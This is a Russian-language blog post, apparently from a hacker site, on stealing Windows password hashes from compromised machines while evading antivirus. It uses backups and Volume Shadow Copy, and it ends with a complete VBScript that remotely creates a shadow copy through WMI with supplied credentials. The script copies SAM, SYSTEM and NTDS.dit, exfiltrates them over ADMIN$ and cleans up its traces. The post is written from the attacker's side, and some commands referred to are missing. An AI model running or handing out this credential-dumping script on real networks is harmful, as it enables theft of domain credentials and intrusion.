Windows shadow hack

Потихоньку проходят времена, когда можно было беспрепятственно шнырять fgdump'ом по всей сети. Сейчас же на каждой корпоративной рабочей станции установлен грозный антивирус , который палит всякие полезные программки, называя их как-то созвучно со словом "hack". В довесок, наблюдается грустная тенденция по инсталляции аверов для защиты серверов все чаще и чаще :(( ...

Убить всяких касперов по-простому, к сожалению, не всегда удается. Поэтому тру-парни пользуют либо собственные сборки fgdump'ов, перекриптованные собственными пакерами, либо ищут альтернативные пути доступа к хешикам пользователей скомпрометированных систем. Про альтернативные методы дерганья нужных данных как раз и пойдет речь в данной публикации.

Первое, что приходит в голову - это воспользоваться встроенными механизмами резервного копирования операционной системы вындовс. Для серверов и рабочих станций справедлива следующая команда:

В данном случае мы получаем system state, который после переброса на компьютер атакующего, необходимо развернуть в тестовой среде. Затем, для получения доступа к свежей копии продуктивной вражеской системы, можно воспользоваться, например, ElcomSoft System Recovery .

Я люблю данный способ, потому как он позволяет в спокойной обстановке изучить систему с использованием привычных интерфейсов без страха неожиданно потерять к ним доступ. Это особенно выгодно, когда речь заходит про копию контроллера домена. Однако у данного подхода существует и серьезное ограничение, связанное с размером файла резервной копии. Для небольшого домена размер файла резервной копии может достигать нескольких гигабайт. Поэтому в ситуевине, когда атакующий ограничен шириной канала, такой вариант, увы, не подходит.

Другой альтернативой достижения аналогичных целей является функция "скрытого копирования" (shadow copy), которая впервые появилась в Windows 2003. Для контроллера домена типовая атака состоит из следующих шагов (см. ссылку ):

1. Получаем слепок целевой системы

2. Копируем необходимые файлы

3. После перемещения этих двух файлов в собственную среду, можно поколдовать над ними с использованием NTDSXtract framework  (см. также ссылку ). 

4. Грепаем хешики и запускаем перебор паролей

С контроллером домена все норм, а вот на рабочих станциях волшебство из командной строки заканчивается. Дело в том, что парни из MS делают все возможное, чтобы максимально разнообразить жизнь суровым сисадминам и тем, кто ими становится после эксплуатации соответствующих уязвимостей на операционных системах, предназначенных для офисного планктона. Ограничивают доступ к системе по RDP в одну сессию, не ставят по умолчанию telnet в последних сборках винды, подсовывают урезанную версию vssadmin, которая не умеет делать новые копии состояния файловой системы. Но выход есть! Все аналогичные действия можно провернуть через WMI.

...
Set objWMIService = GetObject("winmgmts:.rootcimv2")
Set objShadowStorage = objWMIService.Get("Win32_ShadowCopy")
errResult = objShadowStorage.Create("C:", "ClientAccessible", strShadowID)
...

Так был написан наколенный вариант vbs-скрипта для скрытого резервного копирования нужных файлов:

Dim filescopy,filenames filescopy = Array("WindowsSystem32configsystem","WindowsSystem32configsam","Windows<br />TDS<br />tds.dit") set fso=CreateObject("Scripting.FileSystemObject") set objNetwork = CreateObject("WScript.Network") Set WShell = CreateObject("WScript.Shell") tmpdir = fso.GetTempName CurrentDirectory = fso.GetAbsolutePathName(".") Set objArgs = WScript.Arguments if WScript.Arguments.Count = 3 then WScript.Echo "Server: " & objArgs(0) WScript.Echo "User: " & objArgs(1) WScript.Echo "Password: " & objArgs(2) Set objSWbemLocator = CreateObject("WbemScripting.SWbemLocator") Set objWMIService = objSWbemLocator.ConnectServer(objArgs(0), "rootcimv2", objArgs(1), objArgs(2)) srv = objArgs(0) else WScript.Echo "Server: localhost" Set objWMIService = GetObject("winmgmts:.rootcimv2") srv = "127.0.0.1" end if Set objShadowStorage = objWMIService.Get("Win32_ShadowCopy") errResult = objShadowStorage.Create("C:", "ClientAccessible", strShadowID) Set colItems = objWMIService.ExecQuery("Select DeviceObject from Win32_ShadowCopy where ID='" & strShadowID & "'") For Each objItem in colItems strDeviceObject = objItem.DeviceObject Next Set objStartup = objWMIService.Get("Win32_ProcessStartup") Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = 12 set objProcess=objWMIService.Get("Win32_Process") errResult = objProcess.Create("cmd /c mkdir %windir%Temp" & tmpdir,Null,objConfig,intProcessID) For Each val In filescopy errResult = objProcess.Create("cmd /c copy " & strDeviceObject & val & " %windir%Temp" & tmpdir,Null,objConfig,intProcessID) Call ProcMon(intProcessID) Next if srv = "127.0.0.1" Then WShell.run("cmd /c move /Y %windir%Temp" & tmpdir & " " & CurrentDirectory & "127.0.0.1"), 0, true Else WShell.run("cmd /c net use " & srv & "ADMIN$ " & objArgs(2) & " /u:" & objArgs(1) & " && mkdir " & CurrentDirectory & "" & srv & " && copy /Y " & srv & "ADMIN$Temp" & tmpdir & "* " & CurrentDirectory & "" & srv & " && rmdir /S /Q " & srv & "ADMIN$Temp" & tmpdir & " && net use " & srv & "ADMIN$ /del"), 0, true End if Function ProcMon(intProcessID) Dim colProcesses, ExitFlag Set colProcesses = objWMIService.ExecNotificationQuery("SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA 'Win32_Process'") Do Until ExitFlag Set objLatestProcess = colProcesses.NextEvent If objLatestProcess.TargetInstance.ProcessID = intProcessID Then ExitFlag = true Loop End Function
Пример выполнения: